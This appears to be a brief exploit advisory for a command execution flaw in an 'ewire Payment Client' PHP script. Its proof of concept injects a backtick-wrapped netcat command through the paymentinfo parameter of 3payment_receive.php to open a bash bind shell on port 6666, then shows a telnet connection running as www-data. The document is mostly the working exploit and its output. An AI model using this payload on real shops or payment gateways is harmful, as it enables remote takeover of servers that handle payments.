|
|
ewire Payment Client Command Execution Vulnerability
The following proof of concept will open a listening Bash shell on TCP Port 6666 of a vulnerable shop or payment gateway. GET http://www.example.com/simplePHPLinux/3payment_receive.php?paymentin fo=`/bin/nc -l -p6666 -e /bin/bash` $ telnet www.example.com 6666 $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) |
|
Privacy Statement |